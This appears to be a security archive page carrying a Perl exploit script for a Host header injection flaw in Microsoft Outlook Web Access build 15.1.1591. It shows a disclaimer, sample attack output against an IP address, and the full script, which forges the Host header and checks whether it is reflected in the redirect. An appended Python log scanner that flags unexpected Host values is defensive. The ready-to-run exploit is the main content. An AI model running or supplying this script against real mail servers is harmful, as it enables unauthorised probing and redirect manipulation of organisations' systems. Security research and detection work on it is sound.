
Microsoft Outlook Web Access Build 15.1.1591 Header Injection

Posted Sep 2, 2019
Authored by Todor Donev

Microsoft Outlook Web Access build 15.1.1591 suffers from a remote host header injection vulnerability.

tags | exploit, remote, web
SHA-256 | 3851e7b6f8702511bfebd9d28508518b1088e01005f6b566164e025598a95b29

#!/usr/bin/perl -w
#
# Microsoft Outlook Web Access build:15.1.1591 Remote Header 'Host' Injection Exploit
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# [test@localhost microsoft_owa]$ perl microsoft_owa.pl https://133.71.33.37/
# [+] Microsoft Outlook Web Access build:15.1.1591 Remote Header 'Host' Injection Exploit
# =======================================================================================
# [!] Author: Todor Donev <todor.donev@gmail.com>
# =======================================================================================
# [+] > Host: sultan-of-swing
# [+] > User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15
# [+] > Content-Type: application/x-www-form-urlencoded
# [+] < Cache-Control: no-cache
# [+] < Connection: close
# [+] < Date: Sat, 31 Aug 0000 13:37:00 GMT
# [+] < Pragma: no-cache
# [+] < Location: https://sultan-of-swing/owa/
# [+] < Server: Microsoft-IIS/10.0
# [+] < Content-Length: 0
# [+] < Client-Date: Sat, 31 Aug 0000 13:37:00 GMT
# [+] < Client-Peer: 133.71.33.37:443
# [+] < Client-Response-Num: 1
# [+] < Client-SSL-Cert-Issuer: CENSORED
# [+] < Client-SSL-Cert-Subject: CENSORED
# [+] < Client-SSL-Cipher: ECDHE-RSA-AES128-GCM-SHA256
# [+] < Client-SSL-Socket-Class: IO::Socket::SSL
# [+] < Client-SSL-Warning: Peer certificate not verified
# [+] < X-FEServer: MAILSVRTEST
# [+] < X-RequestId: CENSORED
# =======================================================================================
# [+] Microsoft OWA Location is Injected => https://sultan-of-swing/owa/
#
# Description:
# OWASP Testing for HTTP Splitting/Smuggling (OTG-INPVAL-016)
# https://www.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016)
#
#

use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;


my $host = shift || 'https://192.168.1.1:443/';

printf ("[+] Microsoft Outlook Web Access build:15.1.1591 Remote Header 'Host' Injection Exploit\n");
printf ("=======================================================================================\n");
printf ("[!] Author: Todor Donev <todor.donev\@gmail.com>\n");
printf ("[?] e.g. perl $0 https://target:port/\n") and exit if ($host !~ m/^http/);

my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(
    protocols_allowed => ['http', 'https'],
    ssl_opts => { verify_hostname => 0 }
);
$browser->timeout(10);
$browser->agent($user_agent);

my $request = HTTP::Request->new (POST => $host,
    [ Content_Type => "application/x-www-form-urlencoded" ,
      Host => "sultan-of-swing"], " ");
printf ("=======================================================================================\n");
my $response = $browser->request($request);
# A response without a Location header is treated as an empty string
if (($response->header('Location') // '') =~ m/sultan-of-swing/i){

say "[+] > $_: ", $request->header($_) for $request->header_field_names;
say "[+] < $_: ", $response->header($_) for $response->header_field_names;
printf ("=======================================================================================\n");
printf ("[+] Microsoft OWA Location is Injected => %s\n", $response->header('Location'));
exit;

} else {

printf ("[-] Exploit failed!\n");
exit;

}
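
The sample output above shows the supplied Host value being copied into the Location header of the redirect. As an added example (not part of the original script), the following Python sketch scans IIS W3C logs for requests whose Host is outside an expected set; the allow-listed hostnames, the log sample and the assumption that the optional cs-host field is being logged are all constructed for illustration.

```python
import re

# Hostnames this OWA front end is expected to serve (assumed values).
ALLOWED_HOSTS = {"mail.example.com", "autodiscover.example.com"}

# Constructed IIS W3C extended log sample (not from the original page).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem c-ip cs-host sc-status
2019-08-31 13:36:58 GET /owa/ 198.51.100.7 mail.example.com 302
2019-08-31 13:37:00 POST / 203.0.113.9 sultan-of-swing 302
2019-08-31 13:37:04 GET /owa/auth/logon.aspx 198.51.100.7 MAIL.EXAMPLE.COM:443 200
2019-08-31 13:37:09 GET /owa/ 203.0.113.9 - 302
"""

def normalize_host(value):
    """Lower-case the logged Host value and drop an optional :port suffix."""
    host = re.sub(r":\d+$", "", value.strip().lower())
    return host.rstrip(".")

def find_unexpected_hosts(log_text, allowed=ALLOWED_HOSTS):
    """Return log records whose cs-host is not an allow-listed name."""
    fields, findings = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # field order can change mid-file
            continue
        if not line or line.startswith("#") or not fields:
            continue
        values = line.split(" ")
        if len(values) != len(fields):
            continue                       # truncated or malformed record
        rec = dict(zip(fields, values))
        host = normalize_host(rec.get("cs-host", "-"))
        if host not in allowed:            # "-" (no Host logged) is flagged too
            rec["redirected"] = rec.get("sc-status", "").startswith("3")
            findings.append(rec)
    return findings

if __name__ == "__main__":
    for rec in find_unexpected_hosts(SAMPLE_LOG):
        print(rec["date"], rec["time"], rec["c-ip"], rec["cs-host"],
              rec["sc-status"], "redirect" if rec["redirected"] else "")
```

Records flagged with a 3xx status are the ones to review first, since that is where a reflected Host would end up in a Location header.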